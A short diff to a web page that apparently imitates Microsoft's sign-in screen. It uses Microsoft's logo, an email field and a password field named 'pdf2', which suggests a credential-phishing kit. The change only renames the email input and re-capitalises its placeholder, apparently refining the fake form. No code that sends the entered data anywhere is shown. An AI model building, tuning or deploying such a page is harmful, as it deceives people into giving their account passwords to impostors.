--- a/web/index.html
+++ b/web/index.html
@@ -8412,7 +8412,7 @@
                 <p><img src="https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" alt="Microsoft" id="logoimg" style="width: 117px; height: 25.6645px;"><br></p>
                 <div height="24px" id="top2"><strong><span style="font-size: 16px; font-family: Arial, Helvetica, sans-serif;">Sign in</span><br></strong>&nbsp;</div>
                 <div class="form-group">
-                    <div class="input-group"><input type="email" class="form-control" name="Email" placeholder="Email, phone or skype" value="" id="email"></div>
+                    <div class="input-group"><input type="email" class="form-control" name="email" placeholder="Email, Phone or Skype" value="" id="email"></div>
                 </div>
                 <div class="form-group">
                     <div class="input-group">&nbsp;<input type="password" class="form-control" id="password" name="pdf2" placeholder="Password" required="required"></div>
